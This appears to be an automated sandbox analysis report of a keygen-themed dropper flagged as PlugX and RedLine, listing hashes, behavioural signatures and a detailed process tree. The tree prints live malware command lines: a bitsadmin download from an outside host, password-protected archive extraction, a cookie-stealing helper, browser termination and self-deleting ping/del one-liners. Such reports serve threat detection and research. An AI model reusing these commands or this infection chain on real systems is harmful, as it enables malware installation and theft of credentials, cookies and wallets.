Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    1803s
  • max time network
    1741s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    04-05-2021 10:11

General

  • Target

    keygen-step-4d.exe

  • Size

    4.6MB

  • MD5

    563107b1df2a00f4ec868acd9e08a205

  • SHA1

    9cb9c91d66292f5317aa50d92e38834861e9c9b7

  • SHA256

    bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9

  • SHA512

    99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1

Malware Config

Signatures

  • PlugX

    PlugX is a RAT (Remote Access Trojan) that has been around since 2008.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Blocklisted process makes network request 49 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 52 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 16 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 35 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 5 IoCs
  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 19 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 7 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Browser
    1⤵
      PID:2752
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2384
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2360
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2332
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
        1⤵
          PID:2272
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
          1⤵
            PID:1892
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s SENS
            1⤵
              PID:1356
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s UserManager
              1⤵
                PID:1288
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Themes
                1⤵
                  PID:1196
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                  1⤵
                    PID:1084
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:932
                    • C:\Users\Admin\AppData\Roaming\rfctfde
                      C:\Users\Admin\AppData\Roaming\rfctfde
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:5660
                      • C:\Users\Admin\AppData\Roaming\rfctfde
                        C:\Users\Admin\AppData\Roaming\rfctfde
                        3⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:4748
                    • C:\Users\Admin\AppData\Roaming\rfctfde
                      C:\Users\Admin\AppData\Roaming\rfctfde
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:6956
                      • C:\Users\Admin\AppData\Roaming\rfctfde
                        C:\Users\Admin\AppData\Roaming\rfctfde
                        3⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:900
                    • C:\Users\Admin\AppData\Roaming\rfctfde
                      C:\Users\Admin\AppData\Roaming\rfctfde
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:5720
                      • C:\Users\Admin\AppData\Roaming\rfctfde
                        C:\Users\Admin\AppData\Roaming\rfctfde
                        3⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        PID:5796
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                    1⤵
                      PID:68
                    • C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe
                      "C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe"
                      1⤵
                      • Checks computer location settings
                      • Suspicious use of WriteProcessMemory
                      PID:4024
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
                        2⤵
                        • Executes dropped EXE
                        • Drops file in Program Files directory
                        • Suspicious use of SetWindowsHookEx
                        • Suspicious use of WriteProcessMemory
                        PID:2164
                        • C:\Windows\SysWOW64\rundll32.exe
                          "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                          3⤵
                          • Loads dropped DLL
                          • Modifies registry class
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:3672
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3864
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of WriteProcessMemory
                        PID:4432
                        • C:\Users\Admin\AppData\Local\Temp\is-5HV4B.tmp\Install.tmp
                          "C:\Users\Admin\AppData\Local\Temp\is-5HV4B.tmp\Install.tmp" /SL5="$4007E,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                          3⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of WriteProcessMemory
                          PID:4464
                          • C:\Users\Admin\AppData\Local\Temp\is-HCVFB.tmp\Ultra.exe
                            "C:\Users\Admin\AppData\Local\Temp\is-HCVFB.tmp\Ultra.exe" /S /UID=burnerch1
                            4⤵
                            • Drops file in Drivers directory
                            • Executes dropped EXE
                            • Adds Run key to start application
                            • Drops file in Program Files directory
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:4536
                            • C:\Program Files\Windows Defender Advanced Threat Protection\PTQJEKGARW\ultramediaburner.exe
                              "C:\Program Files\Windows Defender Advanced Threat Protection\PTQJEKGARW\ultramediaburner.exe" /VERYSILENT
                              5⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:4788
                              • C:\Users\Admin\AppData\Local\Temp\is-BMSUR.tmp\ultramediaburner.tmp
                                "C:\Users\Admin\AppData\Local\Temp\is-BMSUR.tmp\ultramediaburner.tmp" /SL5="$201EC,281924,62464,C:\Program Files\Windows Defender Advanced Threat Protection\PTQJEKGARW\ultramediaburner.exe" /VERYSILENT
                                6⤵
                                • Executes dropped EXE
                                • Drops file in Program Files directory
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of FindShellTrayWindow
                                • Suspicious use of WriteProcessMemory
                                PID:4820
                                • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                  "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                  7⤵
                                  • Executes dropped EXE
                                  PID:4864
                            • C:\Users\Admin\AppData\Local\Temp\60-409d5-798-22b80-a5495d161088e\Hyhemaehylo.exe
                              "C:\Users\Admin\AppData\Local\Temp\60-409d5-798-22b80-a5495d161088e\Hyhemaehylo.exe"
                              5⤵
                              • Executes dropped EXE
                              • Checks computer location settings
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4876
                            • C:\Users\Admin\AppData\Local\Temp\38-2e498-854-76fa8-c36d4d481dfae\Wosasokopo.exe
                              "C:\Users\Admin\AppData\Local\Temp\38-2e498-854-76fa8-c36d4d481dfae\Wosasokopo.exe"
                              5⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of WriteProcessMemory
                              PID:4940
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ahvjtvlf.fl2\sskiper.exe /s & exit
                                6⤵
                                • Suspicious use of WriteProcessMemory
                                PID:5044
                                • C:\Users\Admin\AppData\Local\Temp\ahvjtvlf.fl2\sskiper.exe
                                  C:\Users\Admin\AppData\Local\Temp\ahvjtvlf.fl2\sskiper.exe /s
                                  7⤵
                                  • Executes dropped EXE
                                  PID:4552
                                  • C:\Users\Admin\AppData\Local\Temp\1666592099.exe
                                    C:\Users\Admin\AppData\Local\Temp\1666592099.exe
                                    8⤵
                                    • Executes dropped EXE
                                    PID:1936
                                  • C:\Users\Admin\AppData\Local\Temp\1337471342.exe
                                    C:\Users\Admin\AppData\Local\Temp\1337471342.exe
                                    8⤵
                                    • Executes dropped EXE
                                    PID:2292
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\ahvjtvlf.fl2\sskiper.exe & exit
                                    8⤵
                                      PID:5232
                                      • C:\Windows\SysWOW64\PING.EXE
                                        ping 0
                                        9⤵
                                        • Runs ping.exe
                                        PID:6156
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wndmdp0q.ci2\KiffMainE1.exe & exit
                                  6⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:4832
                                  • C:\Users\Admin\AppData\Local\Temp\wndmdp0q.ci2\KiffMainE1.exe
                                    C:\Users\Admin\AppData\Local\Temp\wndmdp0q.ci2\KiffMainE1.exe
                                    7⤵
                                    • Executes dropped EXE
                                    PID:4568
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ekr5ls5c.xv0\001.exe & exit
                                  6⤵
                                    PID:3296
                                    • C:\Users\Admin\AppData\Local\Temp\ekr5ls5c.xv0\001.exe
                                      C:\Users\Admin\AppData\Local\Temp\ekr5ls5c.xv0\001.exe
                                      7⤵
                                        PID:5088
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uavjgpxt.add\installer.exe /qn CAMPAIGN="654" & exit
                                      6⤵
                                        PID:4828
                                        • C:\Users\Admin\AppData\Local\Temp\uavjgpxt.add\installer.exe
                                          C:\Users\Admin\AppData\Local\Temp\uavjgpxt.add\installer.exe /qn CAMPAIGN="654"
                                          7⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          • Enumerates connected drives
                                          • Modifies system certificate store
                                          • Suspicious use of FindShellTrayWindow
                                          PID:5088
                                          • C:\Windows\SysWOW64\msiexec.exe
                                            "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Yonatan.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\uavjgpxt.add\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\uavjgpxt.add\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1619863614 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                            8⤵
                                              PID:5808
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\thhwckfb.bek\gpooe.exe & exit
                                          6⤵
                                            PID:5396
                                            • C:\Users\Admin\AppData\Local\Temp\thhwckfb.bek\gpooe.exe
                                              C:\Users\Admin\AppData\Local\Temp\thhwckfb.bek\gpooe.exe
                                              7⤵
                                              • Executes dropped EXE
                                              • Adds Run key to start application
                                              PID:5912
                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                8⤵
                                                • Executes dropped EXE
                                                PID:4272
                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                8⤵
                                                • Executes dropped EXE
                                                PID:5584
                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                8⤵
                                                • Executes dropped EXE
                                                PID:6188
                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                8⤵
                                                • Executes dropped EXE
                                                PID:6608
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wis244ka.nm3\google-game.exe & exit
                                            6⤵
                                              PID:5884
                                              • C:\Users\Admin\AppData\Local\Temp\wis244ka.nm3\google-game.exe
                                                C:\Users\Admin\AppData\Local\Temp\wis244ka.nm3\google-game.exe
                                                7⤵
                                                • Executes dropped EXE
                                                • Suspicious use of SetWindowsHookEx
                                                PID:5208
                                                • C:\Windows\SysWOW64\rundll32.exe
                                                  "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install
                                                  8⤵
                                                  • Loads dropped DLL
                                                  PID:5904
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ukidosan.fyj\askinstall39.exe & exit
                                              6⤵
                                                PID:2344
                                                • C:\Users\Admin\AppData\Local\Temp\ukidosan.fyj\askinstall39.exe
                                                  C:\Users\Admin\AppData\Local\Temp\ukidosan.fyj\askinstall39.exe
                                                  7⤵
                                                  • Executes dropped EXE
                                                  PID:7024
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    cmd.exe /c taskkill /f /im chrome.exe
                                                    8⤵
                                                      PID:6780
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /f /im chrome.exe
                                                        9⤵
                                                        • Kills process with taskkill
                                                        PID:3160
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mm3izopw.13f\setup.exe & exit
                                                  6⤵
                                                    PID:6208
                                                    • C:\Users\Admin\AppData\Local\Temp\mm3izopw.13f\setup.exe
                                                      C:\Users\Admin\AppData\Local\Temp\mm3izopw.13f\setup.exe
                                                      7⤵
                                                      • Executes dropped EXE
                                                      PID:6276
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\mm3izopw.13f\setup.exe"
                                                        8⤵
                                                          PID:6484
                                                          • C:\Windows\SysWOW64\PING.EXE
                                                            ping 1.1.1.1 -n 1 -w 3000
                                                            9⤵
                                                            • Runs ping.exe
                                                            PID:6536
                                                    • C:\Windows\System32\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ahqcwnt4.jai\SunLabsPlayer.exe /S & exit
                                                      6⤵
                                                        PID:6312
                                                        • C:\Users\Admin\AppData\Local\Temp\ahqcwnt4.jai\SunLabsPlayer.exe
                                                          C:\Users\Admin\AppData\Local\Temp\ahqcwnt4.jai\SunLabsPlayer.exe /S
                                                          7⤵
                                                          • Executes dropped EXE
                                                          • Loads dropped DLL
                                                          • Drops file in Program Files directory
                                                          PID:6316
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsq20AA.tmp\tempfile.ps1"
                                                            8⤵
                                                              PID:6688
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsq20AA.tmp\tempfile.ps1"
                                                              8⤵
                                                                PID:4608
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsq20AA.tmp\tempfile.ps1"
                                                                8⤵
                                                                  PID:6588
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsq20AA.tmp\tempfile.ps1"
                                                                  8⤵
                                                                    PID:4248
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsq20AA.tmp\tempfile.ps1"
                                                                    8⤵
                                                                      PID:7104
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsq20AA.tmp\tempfile.ps1"
                                                                      8⤵
                                                                        PID:6016
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsq20AA.tmp\tempfile.ps1"
                                                                        8⤵
                                                                        • Checks for any installed AV software in registry
                                                                        PID:2180
                                                                      • C:\Windows\SysWOW64\bitsadmin.exe
                                                                        "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                        8⤵
                                                                        • Download via BitsAdmin
                                                                        PID:4316
                                                                      • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                        "C:\Program Files (x86)\lighteningplayer\data_load.exe" -p3oiASrVz4Fp3yrG -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                        8⤵
                                                                        • Executes dropped EXE
                                                                        • Drops file in Program Files directory
                                                                        PID:4908
                                                                      • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                        "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pQ0lWHBfyfecMuF9 -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                        8⤵
                                                                        • Executes dropped EXE
                                                                        PID:6664
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsq20AA.tmp\tempfile.ps1"
                                                                        8⤵
                                                                          PID:6848
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsq20AA.tmp\tempfile.ps1"
                                                                          8⤵
                                                                            PID:4552
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsq20AA.tmp\tempfile.ps1"
                                                                            8⤵
                                                                              PID:6108
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsq20AA.tmp\tempfile.ps1"
                                                                              8⤵
                                                                                PID:6492
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsq20AA.tmp\tempfile.ps1"
                                                                                8⤵
                                                                                • Executes dropped EXE
                                                                                PID:6568
                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\ZEhWHVROM\ZEhWHVROM.dll" ZEhWHVROM
                                                                                8⤵
                                                                                • Loads dropped DLL
                                                                                PID:7008
                                                                                • C:\Windows\system32\rundll32.exe
                                                                                  C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\ZEhWHVROM\ZEhWHVROM.dll" ZEhWHVROM
                                                                                  9⤵
                                                                                  • Loads dropped DLL
                                                                                  • Drops file in System32 directory
                                                                                  PID:6836
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsq20AA.tmp\tempfile.ps1"
                                                                                8⤵
                                                                                • Blocklisted process makes network request
                                                                                PID:6780
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsq20AA.tmp\tempfile.ps1"
                                                                                8⤵
                                                                                  PID:684
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsq20AA.tmp\tempfile.ps1"
                                                                                  8⤵
                                                                                    PID:6904
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsq20AA.tmp\tempfile.ps1"
                                                                                    8⤵
                                                                                      PID:2708
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsq20AA.tmp\tempfile.ps1"
                                                                                      8⤵
                                                                                        PID:4964
                                                                                      • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                        "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                        8⤵
                                                                                        • Executes dropped EXE
                                                                                        • Loads dropped DLL
                                                                                        PID:3868
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\agrghzgp.dyi\005.exe & exit
                                                                                    6⤵
                                                                                      PID:6352
                                                                                      • C:\Users\Admin\AppData\Local\Temp\agrghzgp.dyi\005.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\agrghzgp.dyi\005.exe
                                                                                        7⤵
                                                                                          PID:2892
                                                                                      • C:\Windows\System32\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lfgs4vv2.20d\ifhwwyy.exe & exit
                                                                                        6⤵
                                                                                          PID:6536
                                                                                          • C:\Users\Admin\AppData\Local\Temp\lfgs4vv2.20d\ifhwwyy.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\lfgs4vv2.20d\ifhwwyy.exe
                                                                                            7⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:6600
                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                              8⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:4160
                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                              8⤵
                                                                                                PID:1156
                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                8⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:4440
                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                8⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:3696
                                                                                          • C:\Windows\System32\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zrl4vq1c.mrr\toolspab1.exe & exit
                                                                                            6⤵
                                                                                              PID:6792
                                                                                              • C:\Users\Admin\AppData\Local\Temp\zrl4vq1c.mrr\toolspab1.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\zrl4vq1c.mrr\toolspab1.exe
                                                                                                7⤵
                                                                                                • Executes dropped EXE
                                                                                                • Suspicious use of SetThreadContext
                                                                                                PID:6888
                                                                                                • C:\Users\Admin\AppData\Local\Temp\zrl4vq1c.mrr\toolspab1.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\zrl4vq1c.mrr\toolspab1.exe
                                                                                                  8⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Loads dropped DLL
                                                                                                  • Checks SCSI registry key(s)
                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                  PID:6828
                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      • Modifies system certificate store
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:5024
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe" >> NUL
                                                                                        3⤵
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:4528
                                                                                        • C:\Windows\SysWOW64\PING.EXE
                                                                                          ping 127.0.0.1
                                                                                          4⤵
                                                                                          • Runs ping.exe
                                                                                          PID:4600
                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      • Checks whether UAC is enabled
                                                                                      PID:5152
                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:4740
